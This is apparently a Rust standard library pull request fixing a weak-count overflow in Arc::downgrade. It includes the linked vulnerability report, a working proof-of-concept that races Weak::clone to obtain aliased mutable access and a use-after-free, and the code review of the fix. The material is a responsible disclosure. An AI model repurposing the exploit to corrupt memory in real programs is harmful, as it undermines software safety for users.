### PR TITLE
Prevent overflow through Arc::downgrade

### LINKED ISSUE #108706: Overflow in `Arc`
I discovered a memory safety vulnerability in the standard library's `Arc`.

Before the rest of the issue, I just want to say thanks in advance to everyone involved for helping to keep rust safe 🦀 :)

### Description of the vulnerability:
In `Weak::clone`, the weak count is incremented using `fetch_add`, and then it's checked whether the result passed `MAX_REFCOUNT`. As is documented in `Arc::clone`'s code, this is because if the counter gets too close to overflowing, the overflow might happen before the call to `abort` completes, breaking Arc's invariants and probably causing UB. Checking if the counter passed `MAX_REFCOUNT` means that at least 2^15 (in 16-bit platforms) increments to the counter  before `abort` completes are needed for an overflow.

However, in `Arc::downgrade`, the code increments the weak count, without checking that the counter doesn't pass `MAX_REFCOUNT` . This allows the counter to get all the way up to `usize::MAX - 1`. Then, using `Weak::clone`, we can get a much more favorable race than intended.

Therefore, the attack is as follows:

We use `Arc::downgrade` to increment the weak count all the way to `usize::MAX - 1`, then run `Weak::clone` three times in parallel.
The first two will call `abort`, but the third will result in a weak count of 1, indicating that there are no remaining `Weak`s (while there actually are).
Then we can abuse this broken invariant to cause UB, for example through `Arc::get_mut`, as long as we manage to do so before either of the two `abort` calls complete.

### Demonstration of the vulnerability:
Note than to run this exploit yourself, if you're running a 64-bit architecture, the exploit won't run in a reasonable length of time. So `Arc` has to be modified to lower the counter to 32-bits, to demonstrate the vulnerability.

<details><summary> The exploit in code </summary>
<p>

```rust
type Counter = usize;

fn exploit() {
    println!("Started!");
    use std::boxed::Box;
    use std::sync::*;
    // use crate::sync::atomic::{AtomicBool, Ordering};

    let arc = Arc::new(Box::new(7));

    // Keep one of the weaks alive
    let weak = Arc::downgrade(&arc);

    // The weak count starts at `1`.
    // Increase to `Counter::MAX - 1`.
    for i in 0..Counter::MAX - 3 {
        std::mem::forget(Arc::downgrade(&arc));
        if i % 100000000 == 0 {
            println!("{i} out of {}", Counter::MAX);
        }
    }

    let mutex_arc = std::sync::Mutex::new(Some(arc));

    println!("Finished incrementing");

    // let start = AtomicBool::new(false);

    // We run this function three times in parallel, to trigger our vulnerability.
    let evil = || {
        let id = std::thread::current().id();

        // You can try this if some extra syncronization is wanted, to make all three threads
        // start at the approximately same time. I didn't end up needing it, so I don't know if it even helps.
        // loop {
        //     if start.load(Ordering::Relaxed) {
        //         break;
        //     }
        // }
        let weak2 = weak.clone();
        println!("{id:?}: Managed to clone!");
        // Take the `Arc`
        let arc = mutex_arc.lock().unwrap().take();
        let Some(mut arc) = arc else {
            println!("{id:?}: Error: Arc already taken!");
            return;
        };
        println!("{id:?}: Arc taken!");
        // This will succeed even though we still have a `Weak`
        let Some(val) = Arc::get_mut(&mut arc) else {
            println!("{id:?}: Error: Failed to get unique access :(");
            return; // Didn't manage to exploit :(
        };
        println!("{id:?}: Succeeded!");

        let arc2 = weak2.upgrade().unwrap();
        let also_val = &**arc2;
        // `val` and `also_val` point to the same value.
        println!("{id:?}: also_val: {also_val}");
        **val = 9;
        println!("{id:?}: also_val: {also_val}");
        *val = Box::new(5);
        // Now `also_val` points to freed memory
        println!("{id:?}: also_val: {also_val}");
    };

    std::thread::scope(|s| {
        let _ = s.spawn(evil);
        let _ = s.spawn(evil);
        let _ = s.spawn(evil);
        // let _ = s.spawn(|| {
        //     start.store(true, Ordering::Relaxed);
        // });
    });

    println!("Done.\n\n\n");
}
```
</p>
</details>

<details><summary>Running on 64-bit architectures</summary>
<p>
This is how I tested the exploit myself. I modified the `std` so that the counter would only be a `u32`, and ran the exploit as a "test", with this command:

```
> ./x.py --stage 0 test library/alloc --test-args "exploit --nocapture"
```

This is also present [here](https://github.com/noamtashma/rust-arc-safety-bug/tree/Demo).

</p>
</details>

### Fixing:
The fix is very simple. In the `Arc::downgrade` compare-exchange loop, add a check that if `cur > MAX_REFCOUNT`, and it's not `usize::MAX`, panic.
Add a comment explaining that not straying too much above `MAX_REFCOUNT` is a global invariant, and must be enforced in all increment operations.

### Severity:
I'm not sure how severe it is, since it depends on a race with `abort`, and I don't know how to assess winning this race in real code on different platforms.

It should also be noted that in order for this to be exploited, a large amount of `Weak`s need to be leaked (depending on `usize` size), without also leaking heap memory (otherwise the program would run out of memory first).

### PR DESCRIPTION
**Pull request by noamtashma**
Fixes #108706

### CODE REVIEW

File: library/alloc/src/sync.rs [hunk 1]
```diff
@@ -943,11 +949,16 @@ impl<T: ?Sized> Arc<T> {
...
+            if cur > MAX_REFCOUNT {
+                // check if the weak counter is currently "locked"; if so, spin.
+                if cur == usize::MAX {
+                    hint::spin_loop();
+                    cur = this.inner().weak.load(Relaxed);
+                    continue;
+                }
+                // We shouldn't allow the refcount to increase much past `MAX_REFCOUNT`.
+                // See https://github.com/rust-lang/rust/issues/108706
+                panic!("{}", INTERNAL_OVERFLOW_ERROR);
```
Comment (Nilstrieb) [inline library/alloc/src/sync.rs:961]: We can't panic here, because panics can be caught with `panic=unwind`. This needs to be an abort.

Comment (noamtashma) [reply library/alloc/src/sync.rs:961]: It's okay if it gets caught, because the counter hasn't been incremented yet.
As long as it hasn't been incremented, the program can continue.

To the best of my understanding, it can only happen in already-buggy code, which is why aborting in an undocumented way is considered fine. So this wouldn't supposedly be a breaking change.

I figured panicking would be nicer than aborting, and change the `upgrade` method to match as well.

Comment (noamtashma) [reply library/alloc/src/sync.rs:961]: (Since this is in a compare-exchange loop instead of a `fetch_add` or similar).

File: library/alloc/src/sync.rs [hunk 2]
```diff
@@ -51,8 +51,14 @@ mod tests;
 ///
 /// Going above this limit will abort your program (although not
 /// necessarily) at _exactly_ `MAX_REFCOUNT + 1` references.
+///
+/// This is a global invariant, and also applies when using a compare-exchange loop
+/// (see https://github.com/rust-lang/rust/issues/108706).
```
Comment (workingjubilee) [inline library/alloc/src/sync.rs:56]: Please do not link an issue in documentation, here, if the issue is not an open and unresolved question. Simply document what is relevant.

File: library/alloc/src/sync.rs [hunk 3]
```diff
@@ -51,8 +51,14 @@ mod tests;
...
 const MAX_REFCOUNT: usize = (isize::MAX) as usize;
 
+const INTERNAL_OVERFLOW_ERROR: &str =
+    "Internal alloc::sync::Arc error. Perhaps you're leaking Weaks?";
```
Comment (m-ou-se) [inline library/alloc/src/sync.rs:60]: I wouldn't call this an "internal" error, since it's caused by something else (external) misusing Arc/Weak. And it's probably better to avoid addressing someone with "you", since we don't know if it's the programmer or someone else who will read the panic message.

How about something more simple, like `"weak counter overflowed"`?

File: library/alloc/src/sync.rs [hunk 4]
```diff
@@ -943,11 +949,16 @@ impl<T: ?Sized> Arc<T> {
...
+                // check if the weak counter is currently "locked"; if so, spin.
+                if cur == usize::MAX {
+                    hint::spin_loop();
+                    cur = this.inner().weak.load(Relaxed);
+                    continue;
+                }
+                // We shouldn't allow the refcount to increase much past `MAX_REFCOUNT`.
+                // See https://github.com/rust-lang/rust/issues/108706
+                panic!("{}", INTERNAL_OVERFLOW_ERROR);
             }
```
Comment (m-ou-se) [inline library/alloc/src/sync.rs:962]: Instead of a nested `if`, maybe it's a bit easier to read to leave the `if cur == MAX` block untouched, and just add a single `assert!(cur <= MAX_REFCOUNT, "...")` afterwards.

File: library/alloc/src/sync.rs (hunk 3 above)
Comment (noamtashma) [reply library/alloc/src/sync.rs:60]: I called this internal because it's an unstable and undocumented error, and also as a programmer, I would find it a bit surprising that `Arc` "knows" that I've leaked `Weak`s.

Also, technically the counter doesn't overflow, but I guess we could pretend the counter is an `isize` and it did overflow, lol.

I'll write what you suggested.

File: library/alloc/src/sync.rs (hunk 4 above)
Comment (noamtashma) [reply library/alloc/src/sync.rs:960]: I went ahead and changed this in `upgrade` as well.

**Review by m-ou-se — APPROVED** [review]
This looks good! Thanks for the quick fix!

Can you squash the commits into one?

**Comment by noamtashma** [comment]
@m-ou-se , What should be done now?

**Comment by m-ou-se** [comment]
Thank you!

@bors r+
